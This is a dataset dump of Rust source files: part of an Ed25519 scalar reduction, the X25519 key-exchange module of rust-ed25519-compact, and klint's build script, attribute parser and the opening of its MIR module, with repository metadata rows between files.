s0 -= carry0 << 21;
let mut carry2: i64 = (s2 + (1 << 20)) >> 21;
s3 += carry2;
s2 -= carry2 << 21;
let mut carry4: i64 = (s4 + (1 << 20)) >> 21;
s5 += carry4;
s4 -= carry4 << 21;
let mut carry6: i64 = (s6 + (1 << 20)) >> 21;
s7 += carry6;
s6 -= carry6 << 21;
let mut carry8: i64 = (s8 + (1 << 20)) >> 21;
s9 += carry8;
s8 -= carry8 << 21;
let mut carry10: i64 = (s10 + (1 << 20)) >> 21;
s11 += carry10;
s10 -= carry10 << 21;
let mut carry12: i64 = (s12 + (1 << 20)) >> 21;
s13 += carry12;
s12 -= carry12 << 21;
let mut carry14: i64 = (s14 + (1 << 20)) >> 21;
s15 += carry14;
s14 -= carry14 << 21;
let mut carry16: i64 = (s16 + (1 << 20)) >> 21;
s17 += carry16;
s16 -= carry16 << 21;
let carry18: i64 = (s18 + (1 << 20)) >> 21;
s19 += carry18;
s18 -= carry18 << 21;
let carry20: i64 = (s20 + (1 << 20)) >> 21;
s21 += carry20;
s20 -= carry20 << 21;
let carry22: i64 = (s22 + (1 << 20)) >> 21;
s23 += carry22;
s22 -= carry22 << 21;
let mut carry1: i64 = (s1 + (1 << 20)) >> 21;
s2 += carry1;
s1 -= carry1 << 21;
let mut carry3: i64 = (s3 + (1 << 20)) >> 21;
s4 += carry3;
s3 -= carry3 << 21;
let mut carry5: i64 = (s5 + (1 << 20)) >> 21;
s6 += carry5;
s5 -= carry5 << 21;
let mut carry7: i64 = (s7 + (1 << 20)) >> 21;
s8 += carry7;
s7 -= carry7 << 21;
let mut carry9: i64 = (s9 + (1 << 20)) >> 21;
s10 += carry9;
s9 -= carry9 << 21;
let mut carry11: i64 = (s11 + (1 << 20)) >> 21;
s12 += carry11;
s11 -= carry11 << 21;
let mut carry13: i64 = (s13 + (1 << 20)) >> 21;
s14 += carry13;
s13 -= carry13 << 21;
let mut carry15: i64 = (s15 + (1 << 20)) >> 21;
s16 += carry15;
s15 -= carry15 << 21;
let carry17: i64 = (s17 + (1 << 20)) >> 21;
s18 += carry17;
s17 -= carry17 << 21;
let carry19: i64 = (s19 + (1 << 20)) >> 21;
s20 += carry19;
s19 -= carry19 << 21;
let carry21: i64 = (s21 + (1 << 20)) >> 21;
s22 += carry21;
s21 -= carry21 << 21;
s11 += s23 * 666643;
s12 += s23 * 470296;
s13 += s23 * 654183;
s14 -= s23 * 997805;
s15 += s23 * 136657;
s16 -= s23 * 683901;
s10 += s22 * 666643;
s11 += s22 * 470296;
s12 += s22 * 654183;
s13 -= s22 * 997805;
s14 += s22 * 136657;
s15 -= s22 * 683901;
s9 += s21 * 666643;
s10 += s21 * 470296;
s11 += s21 * 654183;
s12 -= s21 * 997805;
s13 += s21 * 136657;
s14 -= s21 * 683901;
s8 += s20 * 666643;
s9 += s20 * 470296;
s10 += s20 * 654183;
s11 -= s20 * 997805;
s12 += s20 * 136657;
s13 -= s20 * 683901;
s7 += s19 * 666643;
s8 += s19 * 470296;
s9 += s19 * 654183;
s10 -= s19 * 997805;
s11 += s19 * 136657;
s12 -= s19 * 683901;
s6 += s18 * 666643;
s7 += s18 * 470296;
s8 += s18 * 654183;
s9 -= s18 * 997805;
s10 += s18 * 136657;
s11 -= s18 * 683901;
carry6 = (s6 + (1 << 20)) >> 21;
s7 += carry6;
s6 -= carry6 << 21;
carry8 = (s8 + (1 << 20)) >> 21;
s9 += carry8;
s8 -= carry8 << 21;
carry10 = (s10 + (1 << 20)) >> 21;
s11 += carry10;
s10 -= carry10 << 21;
carry12 = (s12 + (1 << 20)) >> 21;
s13 += carry12;
s12 -= carry12 << 21;
carry14 = (s14 + (1 << 20)) >> 21;
s15 += carry14;
s14 -= carry14 << 21;
carry16 = (s16 + (1 << 20)) >> 21;
s17 += carry16;
s16 -= carry16 << 21;
carry7 = (s7 + (1 << 20)) >> 21;
s8 += carry7;
s7 -= carry7 << 21;
carry9 = (s9 + (1 << 20)) >> 21;
s10 += carry9;
s9 -= carry9 << 21;
carry11 = (s11 + (1 << 20)) >> 21;
s12 += carry11;
s11 -= carry11 << 21;
carry13 = (s13 + (1 << 20)) >> 21;
s14 += carry13;
s13 -= carry13 << 21;
carry15 = (s15 + (1 << 20)) >> 21;
s16 += carry15;
s15 -= carry15 << 21;
s5 += s17 * 666643;
s6 += s17 * 470296;
s7 += s17 * 654183;
s8 -= s17 * 997805;
s9 += s17 * 136657;
s10 -= s17 * 683901;
s4 += s16 * 666643;
s5 += s16 * 470296;
s6 += s16 * 654183;
s7 -= s16 * 997805;
s8 += s16 * 136657;
s9 -= s16 * 683901;
s3 += s15 * 666643;
s4 += s15 * 470296;
s5 += s15 * 654183;
s6 -= s15 * 997805;
s7 += s15 * 136657;
s8 -= s15 * 683901;
s2 += s14 * 666643;
s3 += s14 * 470296;
s4 += s14 * 654183;
s5 -= s14 * 997805;
s6 += s14 * 136657;
s7 -= s14 * 683901;
s1 += s13 * 666643;
s2 += s13 * 470296;
s3 += s13 * 654183;
s4 -= s13 * 997805;
s5 += s13 * 136657;
s6 -= s13 * 683901;
s0 += s12 * 666643;
s1 += s12 * 470296;
s2 += s12 * 654183;
s3 -= s12 * 997805;
s4 += s12 * 136657;
s5 -= s12 * 683901;
s12 = 0;
carry0 = (s0 + (1 << 20)) >> 21;
s1 += carry0;
s0 -= carry0 << 21;
carry2 = (s2 + (1 << 20)) >> 21;
s3 += carry2;
s2 -= carry2 << 21;
carry4 = (s4 + (1 << 20)) >> 21;
s5 += carry4;
s4 -= carry4 << 21;
carry6 = (s6 + (1 << 20)) >> 21;
s7 += carry6;
s6 -= carry6 << 21;
carry8 = (s8 + (1 << 20)) >> 21;
s9 += carry8;
s8 -= carry8 << 21;
carry10 = (s10 + (1 << 20)) >> 21;
s11 += carry10;
s10 -= carry10 << 21;
carry1 = (s1 + (1 << 20)) >> 21;
s2 += carry1;
s1 -= carry1 << 21;
carry3 = (s3 + (1 << 20)) >> 21;
s4 += carry3;
s3 -= carry3 << 21;
carry5 = (s5 + (1 << 20)) >> 21;
s6 += carry5;
s5 -= carry5 << 21;
carry7 = (s7 + (1 << 20)) >> 21;
s8 += carry7;
s7 -= carry7 << 21;
carry9 = (s9 + (1 << 20)) >> 21;
s10 += carry9;
s9 -= carry9 << 21;
carry11 = (s11 + (1 << 20)) >> 21;
s12 += carry11;
s11 -= carry11 << 21;
s0 += s12 * 666643;
s1 += s12 * 470296;
s2 += s12 * 654183;
s3 -= s12 * 997805;
s4 += s12 * 136657;
s5 -= s12 * 683901;
s12 = 0;
carry0 = s0 >> 21;
s1 += carry0;
s0 -= carry0 << 21;
carry1 = s1 >> 21;
s2 += carry1;
s1 -= carry1 << 21;
carry2 = s2 >> 21;
s3 += carry2;
s2 -= carry2 << 21;
carry3 = s3 >> 21;
s4 += carry3;
s3 -= carry3 << 21;
carry4 = s4 >> 21;
s5 += carry4;
s4 -= carry4 << 21;
carry5 = s5 >> 21;
s6 += carry5;
s5 -= carry5 << 21;
carry6 = s6 >> 21;
s7 += carry6;
s6 -= carry6 << 21;
carry7 = s7 >> 21;
s8 += carry7;
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | true |
jedisct1/rust-ed25519-compact | https://github.com/jedisct1/rust-ed25519-compact/blob/661a45223bece49b3ad8da33fe0f3a408ea895c1/src/x25519.rs | src/x25519.rs | use core::ops::{Deref, DerefMut};
use super::common::*;
use super::error::Error;
use super::field25519::*;
const POINT_BYTES: usize = 32;
/// Non-uniform output of a scalar multiplication.
/// This represents a point on the curve, and should not be used directly as a
/// cipher key.
#[derive(Clone, Debug, Eq, PartialEq, Hash)]
pub struct DHOutput([u8; DHOutput::BYTES]);
impl DHOutput {
pub const BYTES: usize = 32;
}
impl Deref for DHOutput {
type Target = [u8; DHOutput::BYTES];
/// Returns the output of the scalar multiplication as bytes.
/// The output is not uniform, and should be hashed before use.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for DHOutput {
/// Returns the output of the scalar multiplication as bytes.
/// The output is not uniform, and should be hashed before use.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl From<DHOutput> for PublicKey {
fn from(dh: DHOutput) -> Self {
PublicKey(dh.0)
}
}
impl From<DHOutput> for SecretKey {
fn from(dh: DHOutput) -> Self {
SecretKey(dh.0)
}
}
impl Drop for DHOutput {
fn drop(&mut self) {
Mem::wipe(&mut self.0)
}
}
/// A public key.
#[derive(Copy, Clone, Debug, Eq, PartialEq, Hash)]
pub struct PublicKey([u8; POINT_BYTES]);
impl PublicKey {
/// Number of raw bytes in a public key.
pub const BYTES: usize = POINT_BYTES;
/// Creates a public key from raw bytes.
pub fn new(pk: [u8; PublicKey::BYTES]) -> Self {
PublicKey(pk)
}
/// Creates a public key from a slice.
pub fn from_slice(pk: &[u8]) -> Result<Self, Error> {
let mut pk_ = [0u8; PublicKey::BYTES];
if pk.len() != pk_.len() {
return Err(Error::InvalidPublicKey);
}
Fe::reject_noncanonical(pk)?;
pk_.copy_from_slice(pk);
Ok(PublicKey::new(pk_))
}
/// Multiply a point by the cofactor, returning an error if the element is
/// in a small-order group.
pub fn clear_cofactor(&self) -> Result<[u8; PublicKey::BYTES], Error> {
let cofactor = [
8u8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0,
];
self.ladder(&cofactor, 4)
}
/// Multiply the point represented by the public key by the scalar after
/// clamping it
pub fn dh(&self, sk: &SecretKey) -> Result<DHOutput, Error> {
let sk = sk.clamped();
Ok(DHOutput(self.ladder(&sk.0, 255)?))
}
/// Multiply the point represented by the public key by the scalar WITHOUT
/// CLAMPING
pub fn unclamped_mul(&self, sk: &SecretKey) -> Result<DHOutput, Error> {
self.clear_cofactor()?;
Ok(DHOutput(self.ladder(&sk.0, 256)?))
}
fn ladder(&self, s: &[u8], bits: usize) -> Result<[u8; POINT_BYTES], Error> {
let x1 = Fe::from_bytes(&self.0);
let mut x2 = FE_ONE;
let mut z2 = FE_ZERO;
let mut x3 = x1;
let mut z3 = FE_ONE;
let mut swap: u8 = 0;
let mut pos = bits - 1;
loop {
let bit = (s[pos >> 3] >> (pos & 7)) & 1;
swap ^= bit;
Fe::cswap2(&mut x2, &mut x3, &mut z2, &mut z3, swap);
swap = bit;
let a = x2 + z2;
let b = x2 - z2;
let aa = a.square();
let bb = b.square();
x2 = aa * bb;
let e = aa - bb;
let da = (x3 - z3) * a;
let cb = (x3 + z3) * b;
x3 = (da + cb).square();
z3 = x1 * ((da - cb).square());
z2 = e * (bb + (e.mul32(121666)));
if pos == 0 {
break;
}
pos -= 1;
}
Fe::cswap2(&mut x2, &mut x3, &mut z2, &mut z3, swap);
z2 = z2.invert();
x2 = x2 * z2;
if x2.is_zero() {
return Err(Error::WeakPublicKey);
}
Ok(x2.to_bytes())
}
/// The Curve25519 base point
#[inline]
pub fn base_point() -> PublicKey {
PublicKey(FE_CURVE25519_BASEPOINT.to_bytes())
}
}
impl Deref for PublicKey {
type Target = [u8; PublicKey::BYTES];
/// Returns a public key as bytes.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for PublicKey {
/// Returns a public key as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
/// A secret key.
#[derive(Clone, Debug, Eq, PartialEq, Hash)]
pub struct SecretKey([u8; SecretKey::BYTES]);
impl SecretKey {
/// Number of bytes in a secret key.
pub const BYTES: usize = 32;
/// Creates a secret key from raw bytes.
pub fn new(sk: [u8; SecretKey::BYTES]) -> Self {
SecretKey(sk)
}
/// Creates a secret key from a slice.
pub fn from_slice(sk: &[u8]) -> Result<Self, Error> {
let mut sk_ = [0u8; SecretKey::BYTES];
if sk.len() != sk_.len() {
return Err(Error::InvalidSecretKey);
}
sk_.copy_from_slice(sk);
Ok(SecretKey::new(sk_))
}
/// Perform the X25519 clamping magic
pub fn clamped(&self) -> SecretKey {
let mut clamped = self.clone();
clamped[0] &= 248;
clamped[31] &= 63;
clamped[31] |= 64;
clamped
}
/// Recover the public key
pub fn recover_public_key(&self) -> Result<PublicKey, Error> {
let sk = self.clamped();
Ok(PublicKey(PublicKey::base_point().ladder(&sk.0, 255)?))
}
/// Returns `Ok(())` if the given public key is the public counterpart of
/// this secret key.
/// Returns `Err(Error::InvalidPublicKey)` otherwise.
pub fn validate_public_key(&self, pk: &PublicKey) -> Result<(), Error> {
let recovered_pk = self.recover_public_key()?;
if recovered_pk != *pk {
return Err(Error::InvalidPublicKey);
}
Ok(())
}
}
impl Drop for SecretKey {
fn drop(&mut self) {
Mem::wipe(&mut self.0)
}
}
impl Deref for SecretKey {
type Target = [u8; SecretKey::BYTES];
/// Returns a secret key as bytes.
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for SecretKey {
/// Returns a secret key as mutable bytes.
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
/// A key pair.
#[derive(Clone, Debug, Eq, PartialEq, Hash)]
pub struct KeyPair {
/// Public key part of the key pair.
pub pk: PublicKey,
/// Secret key part of the key pair.
pub sk: SecretKey,
}
impl KeyPair {
/// Generates a new key pair.
#[cfg(feature = "random")]
pub fn generate() -> KeyPair {
let mut sk = [0u8; SecretKey::BYTES];
getrandom::fill(&mut sk).expect("getrandom");
if Fe::from_bytes(&sk).is_zero() {
panic!("All-zero secret key");
}
let sk = SecretKey(sk);
let pk = sk
.recover_public_key()
.expect("generated public key is weak");
KeyPair { pk, sk }
}
/// Check that the public key is valid for the secret key.
pub fn validate(&self) -> Result<(), Error> {
self.sk.validate_public_key(&self.pk)
}
}
#[cfg(not(feature = "disable-signatures"))]
mod from_ed25519 {
use super::super::{
edwards25519, sha512, KeyPair as EdKeyPair, PublicKey as EdPublicKey,
SecretKey as EdSecretKey,
};
use super::*;
impl SecretKey {
/// Convert an Ed25519 secret key to a X25519 secret key.
pub fn from_ed25519(edsk: &EdSecretKey) -> Result<SecretKey, Error> {
let seed = edsk.seed();
let az: [u8; 64] = {
let mut hash_output = sha512::Hash::hash(*seed);
hash_output[0] &= 248;
hash_output[31] &= 63;
hash_output[31] |= 64;
hash_output
};
SecretKey::from_slice(&az[..32])
}
}
impl PublicKey {
/// Convert an Ed25519 public key to a X25519 public key.
pub fn from_ed25519(edpk: &EdPublicKey) -> Result<PublicKey, Error> {
let pk = PublicKey::from_slice(
&edwards25519::ge_to_x25519_vartime(edpk).ok_or(Error::InvalidPublicKey)?,
)?;
pk.clear_cofactor()?;
Ok(pk)
}
}
impl KeyPair {
/// Convert an Ed25519 key pair to a X25519 key pair.
pub fn from_ed25519(edkp: &EdKeyPair) -> Result<KeyPair, Error> {
let pk = PublicKey::from_ed25519(&edkp.pk)?;
let sk = SecretKey::from_ed25519(&edkp.sk)?;
Ok(KeyPair { pk, sk })
}
}
}
#[cfg(not(feature = "disable-signatures"))]
#[allow(unused)]
pub use from_ed25519::*;
#[test]
fn test_x25519() {
let sk_1 = SecretKey::from_slice(&[
1u8, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0,
])
.unwrap();
let output = PublicKey::base_point().unclamped_mul(&sk_1).unwrap();
assert_eq!(PublicKey::from(output), PublicKey::base_point());
let kp_a = KeyPair::generate();
let kp_b = KeyPair::generate();
let output_a = kp_b.pk.dh(&kp_a.sk).unwrap();
let output_b = kp_a.pk.dh(&kp_b.sk).unwrap();
assert_eq!(output_a, output_b);
}
#[cfg(not(feature = "disable-signatures"))]
#[test]
fn test_x25519_map() {
use super::KeyPair as EdKeyPair;
let edkp_a = EdKeyPair::generate();
let edkp_b = EdKeyPair::generate();
let kp_a = KeyPair::from_ed25519(&edkp_a).unwrap();
let kp_b = KeyPair::from_ed25519(&edkp_b).unwrap();
let output_a = kp_b.pk.dh(&kp_a.sk).unwrap();
let output_b = kp_a.pk.dh(&kp_b.sk).unwrap();
assert_eq!(output_a, output_b);
}
#[test]
#[cfg(all(not(feature = "disable-signatures"), feature = "random"))]
fn test_x25519_invalid_keypair() {
let kp1 = KeyPair::generate();
let kp2 = KeyPair::generate();
assert_eq!(
kp1.sk.validate_public_key(&kp2.pk).unwrap_err(),
Error::InvalidPublicKey
);
assert_eq!(
kp2.sk.validate_public_key(&kp1.pk).unwrap_err(),
Error::InvalidPublicKey
);
assert!(kp1.sk.validate_public_key(&kp1.pk).is_ok());
assert!(kp2.sk.validate_public_key(&kp2.pk).is_ok());
assert!(kp1.validate().is_ok());
}
| rust | MIT | 661a45223bece49b3ad8da33fe0f3a408ea895c1 | 2026-01-04T20:21:43.974864Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/build.rs | build.rs | fn probe_sysroot() -> String {
std::process::Command::new("rustc")
.arg("--print")
.arg("sysroot")
.output()
.ok()
.and_then(|out| String::from_utf8(out.stdout).ok())
.map(|x| x.trim().to_owned())
.expect("failed to probe rust sysroot")
}
fn main() {
// No need to rerun for other changes.
println!("cargo::rerun-if-changed=build.rs");
// Probe rustc sysroot. Although this is automatically added when using Cargo, the compiled
// binary would be missing the necessary RPATH so it cannot run without using Cargo.
let sysroot = probe_sysroot();
println!("cargo::rustc-link-arg=-Wl,-rpath={sysroot}/lib");
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/attribute.rs | src/attribute.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use std::sync::Arc;
use rustc_ast::tokenstream::{self, TokenTree};
use rustc_ast::{DelimArgs, LitKind, MetaItemLit, token};
use rustc_errors::{Diag, ErrorGuaranteed};
use rustc_hir::{AttrArgs, AttrItem, Attribute, HirId};
use rustc_middle::ty::TyCtxt;
use rustc_span::symbol::Ident;
use rustc_span::{Span, Symbol, sym};
use crate::preempt_count::ExpectationRange;
#[derive(Debug, Clone, Copy, Encodable, Decodable)]
pub struct PreemptionCount {
pub adjustment: Option<i32>,
pub expectation: Option<ExpectationRange>,
pub unchecked: bool,
}
impl Default for PreemptionCount {
fn default() -> Self {
PreemptionCount {
adjustment: None,
expectation: None,
unchecked: false,
}
}
}
#[derive(Debug)]
pub enum KlintAttribute {
PreemptionCount(PreemptionCount),
DropPreemptionCount(PreemptionCount),
ReportPreeptionCount,
DumpMir,
/// Make an item known to klint as special.
///
/// This is similar to `rustc_diagnostic_item` in the Rust standard library.
DiagnosticItem(Symbol),
}
struct Cursor<'a> {
eof: TokenTree,
cursor: tokenstream::TokenStreamIter<'a>,
}
impl<'a> Cursor<'a> {
fn new(cursor: tokenstream::TokenStreamIter<'a>, end_span: Span) -> Self {
let eof = TokenTree::Token(
token::Token {
kind: token::TokenKind::Eof,
span: end_span,
},
tokenstream::Spacing::Alone,
);
Cursor { eof, cursor }
}
fn is_eof(&self) -> bool {
self.cursor.peek().is_none()
}
fn peek(&self) -> &TokenTree {
self.cursor.peek().unwrap_or(&self.eof)
}
fn next(&mut self) -> &TokenTree {
self.cursor.next().unwrap_or(&self.eof)
}
}
struct AttrParser<'tcx> {
tcx: TyCtxt<'tcx>,
hir_id: HirId,
}
impl<'tcx> AttrParser<'tcx> {
fn error(
&self,
span: Span,
decorate: impl for<'a, 'b> FnOnce(&'b mut Diag<'a, ()>),
) -> Result<!, ErrorGuaranteed> {
self.tcx
.node_span_lint(crate::INCORRECT_ATTRIBUTE, self.hir_id, span, |lint| {
lint.primary_message("incorrect usage of `#[kint::preempt_count]`");
decorate(lint);
});
Err(self
.tcx
.dcx()
.span_delayed_bug(span, "incorrect usage of `#[kint::preempt_count]`"))
}
fn parse_comma_delimited(
&self,
mut cursor: Cursor<'_>,
mut f: impl for<'a> FnMut(Cursor<'a>) -> Result<Cursor<'a>, ErrorGuaranteed>,
) -> Result<(), ErrorGuaranteed> {
loop {
if cursor.is_eof() {
return Ok(());
}
cursor = f(cursor)?;
if cursor.is_eof() {
return Ok(());
}
// Check and skip `,`.
let comma = cursor.next();
if !matches!(
comma,
TokenTree::Token(
token::Token {
kind: token::TokenKind::Comma,
..
},
_
)
) {
self.error(comma.span(), |diag| {
diag.help("`,` expected between property values");
})?;
}
}
}
fn parse_eq_delimited<'a>(
&self,
mut cursor: Cursor<'a>,
need_eq: impl FnOnce(Ident) -> Result<bool, ErrorGuaranteed>,
f: impl FnOnce(Ident, Cursor<'a>) -> Result<Cursor<'a>, ErrorGuaranteed>,
) -> Result<Cursor<'a>, ErrorGuaranteed> {
let prop = cursor.next();
let invalid_prop = |span| {
self.error(span, |diag| {
diag.help("identifier expected");
})?;
};
let TokenTree::Token(token, _) = prop else {
return invalid_prop(prop.span());
};
let Some((name, _)) = token.ident() else {
return invalid_prop(token.span);
};
let need_eq = need_eq(name)?;
// Check and skip `=`.
let eq = cursor.peek();
let is_eq = matches!(
eq,
TokenTree::Token(
token::Token {
kind: token::TokenKind::Eq,
..
},
_
)
);
if need_eq && !is_eq {
self.error(eq.span(), |diag| {
diag.help("`=` expected after property name");
})?;
}
if !need_eq && is_eq {
self.error(eq.span(), |diag| {
diag.help("unexpected `=` after property name");
})?;
}
if is_eq {
cursor.next();
}
cursor = f(name, cursor)?;
Ok(cursor)
}
fn parse_i32<'a>(&self, mut cursor: Cursor<'a>) -> Result<(i32, Cursor<'a>), ErrorGuaranteed> {
let expect_int = |span| {
self.error(span, |diag| {
diag.help("an integer expected");
})
};
let negative = if matches!(
cursor.peek(),
TokenTree::Token(
token::Token {
kind: token::TokenKind::Minus,
..
},
_
)
) {
cursor.next();
true
} else {
false
};
let token = cursor.next();
let TokenTree::Token(
token::Token {
kind: token::TokenKind::Literal(lit),
..
},
_,
) = token
else {
expect_int(token.span())?
};
if lit.kind != token::LitKind::Integer || lit.suffix.is_some() {
expect_int(token.span())?;
}
let Some(v) = lit.symbol.as_str().parse::<i32>().ok() else {
expect_int(token.span())?;
};
let v = if negative { -v } else { v };
Ok((v, cursor))
}
fn parse_expectation_range<'a>(
&self,
mut cursor: Cursor<'a>,
) -> Result<((u32, Option<u32>), Cursor<'a>), ErrorGuaranteed> {
let expect_range = |span| {
self.error(span, |diag| {
diag.help("a range expected");
})
};
let start_span = cursor.peek().span();
let mut start = 0;
if !matches!(
cursor.peek(),
TokenTree::Token(
token::Token {
kind: token::TokenKind::DotDot | token::TokenKind::DotDotEq,
..
},
_
)
) {
let token = cursor.next();
let TokenTree::Token(
token::Token {
kind: token::TokenKind::Literal(lit),
..
},
_,
) = token
else {
expect_range(token.span())?
};
if lit.kind != token::LitKind::Integer {
expect_range(token.span())?;
}
let Some(v) = lit.symbol.as_str().parse::<u32>().ok() else {
expect_range(token.span())?;
};
start = v;
}
let inclusive = match cursor.peek() {
TokenTree::Token(
token::Token {
kind: token::TokenKind::DotDot,
..
},
_,
) => Some(false),
TokenTree::Token(
token::Token {
kind: token::TokenKind::DotDotEq,
..
},
_,
) => Some(true),
_ => None,
};
let mut end = Some(start + 1);
if let Some(inclusive) = inclusive {
cursor.next();
let skip_hi = match cursor.peek() {
TokenTree::Token(
token::Token {
kind: token::TokenKind::Comma | token::TokenKind::Eof,
..
},
_,
) => true,
_ => false,
};
if skip_hi {
end = None;
} else {
let token = cursor.next();
let TokenTree::Token(
token::Token {
kind: token::TokenKind::Literal(lit),
..
},
_,
) = token
else {
expect_range(token.span())?
};
if lit.kind != token::LitKind::Integer {
expect_range(token.span())?;
}
let Some(range) = lit.symbol.as_str().parse::<u32>().ok() else {
expect_range(token.span())?;
};
end = Some(if inclusive { range + 1 } else { range });
}
}
if end.is_some() && end.unwrap() <= start {
let end_span = cursor.next().span();
self.error(start_span.until(end_span), |diag| {
diag.help("the preemption count expectation range must be non-empty");
})?;
}
Ok(((start, end), cursor))
}
fn parse_preempt_count(
&self,
attr: &Attribute,
item: &AttrItem,
) -> Result<PreemptionCount, ErrorGuaranteed> {
let mut adjustment = None;
let mut expectation = None;
let mut unchecked = false;
let AttrArgs::Delimited(DelimArgs {
dspan: delim_span,
tokens: tts,
..
}) = &item.args
else {
self.error(attr.span(), |diag| {
diag.help("correct usage looks like `#[kint::preempt_count(...)]`");
})?;
};
self.parse_comma_delimited(Cursor::new(tts.iter(), delim_span.close), |cursor| {
self.parse_eq_delimited(
cursor,
|name| {
Ok(match name.name {
crate::symbol::adjust | sym::expect => true,
crate::symbol::unchecked => false,
_ => {
self.error(name.span, |diag| {
diag.help(
"unknown property, expected `adjust`, `expect` or `unchecked`",
);
})?;
}
})
},
|name, mut cursor| {
match name.name {
crate::symbol::adjust => {
let v;
(v, cursor) = self.parse_i32(cursor)?;
adjustment = Some(v);
}
sym::expect => {
let (lo, hi);
((lo, hi), cursor) = self.parse_expectation_range(cursor)?;
expectation = Some(ExpectationRange { lo, hi });
}
crate::symbol::unchecked => {
unchecked = true;
}
_ => unreachable!(),
}
Ok(cursor)
},
)
})?;
if adjustment.is_none() && expectation.is_none() {
self.error(delim_span.entire(), |diag| {
diag.help("at least one of `adjust` or `expect` property must be specified");
})?;
}
Ok(PreemptionCount {
adjustment,
expectation,
unchecked,
})
}
fn parse(&self, attr: &Attribute) -> Option<KlintAttribute> {
let Attribute::Unparsed(item) = attr else {
return None;
};
if item.path.segments[0].name != crate::symbol::klint {
return None;
};
if item.path.segments.len() != 2 {
self.tcx
.node_span_lint(crate::INCORRECT_ATTRIBUTE, self.hir_id, item.span, |lint| {
lint.primary_message("invalid klint attribute");
});
return None;
}
match item.path.segments[1].name {
// Shorthands
crate::symbol::any_context | crate::symbol::atomic_context => {
Some(KlintAttribute::PreemptionCount(PreemptionCount {
adjustment: None,
expectation: Some(ExpectationRange::top()),
unchecked: false,
}))
}
crate::symbol::atomic_context_only => {
Some(KlintAttribute::PreemptionCount(PreemptionCount {
adjustment: None,
expectation: Some(ExpectationRange { lo: 1, hi: None }),
unchecked: false,
}))
}
crate::symbol::process_context => {
Some(KlintAttribute::PreemptionCount(PreemptionCount {
adjustment: None,
expectation: Some(ExpectationRange::single_value(0)),
unchecked: false,
}))
}
crate::symbol::preempt_count => Some(KlintAttribute::PreemptionCount(
self.parse_preempt_count(attr, item).ok()?,
)),
crate::symbol::drop_preempt_count => Some(KlintAttribute::DropPreemptionCount(
self.parse_preempt_count(attr, item).ok()?,
)),
crate::symbol::report_preempt_count => Some(KlintAttribute::ReportPreeptionCount),
crate::symbol::dump_mir => Some(KlintAttribute::DumpMir),
crate::symbol::diagnostic_item => {
let AttrArgs::Eq {
eq_span: _,
expr:
MetaItemLit {
kind: LitKind::Str(value, _),
..
},
} = item.args
else {
self.error(attr.span(), |diag| {
diag.help(
r#"correct usage looks like `#[kint::diagnostic_item = "name"]`"#,
);
})
.ok()?;
};
Some(KlintAttribute::DiagnosticItem(value))
}
_ => {
self.tcx.node_span_lint(
crate::INCORRECT_ATTRIBUTE,
self.hir_id,
item.path.segments[1].span,
|lint| {
lint.primary_message("unrecognized klint attribute");
},
);
None
}
}
}
}
pub fn parse_klint_attribute(
tcx: TyCtxt<'_>,
hir_id: HirId,
attr: &Attribute,
) -> Option<KlintAttribute> {
AttrParser { tcx, hir_id }.parse(attr)
}
memoize!(
pub fn klint_attributes<'tcx>(
cx: &AnalysisCtxt<'tcx>,
hir_id: HirId,
) -> Arc<Vec<KlintAttribute>> {
let mut v = Vec::new();
for attr in cx.hir_attrs(hir_id) {
let Some(attr) = crate::attribute::parse_klint_attribute(cx.tcx, hir_id, attr) else {
continue;
};
v.push(attr);
}
Arc::new(v)
}
);
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/mir.rs | src/mir.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
pub mod drop_shim;
pub mod elaborate_drop;
pub mod patch;
use rustc_hir::{self as hir, def::DefKind};
use rustc_middle::mir::CallSource;
use rustc_middle::mir::{
Body, ConstOperand, LocalDecl, Operand, Place, ProjectionElem, Rvalue, SourceInfo, Statement,
StatementKind, TerminatorKind,
};
use rustc_middle::ty::{self, TyCtxt};
use rustc_span::def_id::{CrateNum, DefId, DefIndex, LocalDefId};
use rustc_span::{DUMMY_SP, source_map::Spanned, sym};
use crate::ctxt::AnalysisCtxt;
use crate::ctxt::PersistentQuery;
pub fn local_analysis_mir<'tcx>(cx: &AnalysisCtxt<'tcx>, did: LocalDefId) -> &'tcx Body<'tcx> {
if cx.is_constructor(did.to_def_id()) {
return cx.optimized_mir(did.to_def_id());
}
let body = cx
.mir_drops_elaborated_and_const_checked(did)
.borrow()
.clone();
let body = remap_mir_for_const_eval_select(cx.tcx, body, hir::Constness::NotConst);
cx.arena.alloc(body)
}
// Copied from rustc_mir_transform/src/lib.rs.
// This function was not public so we have to reproduce it here.
fn remap_mir_for_const_eval_select<'tcx>(
tcx: TyCtxt<'tcx>,
mut body: Body<'tcx>,
context: hir::Constness,
) -> Body<'tcx> {
for bb in body.basic_blocks.as_mut().iter_mut() {
let terminator = bb.terminator.as_mut().expect("invalid terminator");
match terminator.kind {
TerminatorKind::Call {
func: Operand::Constant(box ConstOperand { ref const_, .. }),
ref mut args,
destination,
target,
unwind,
fn_span,
..
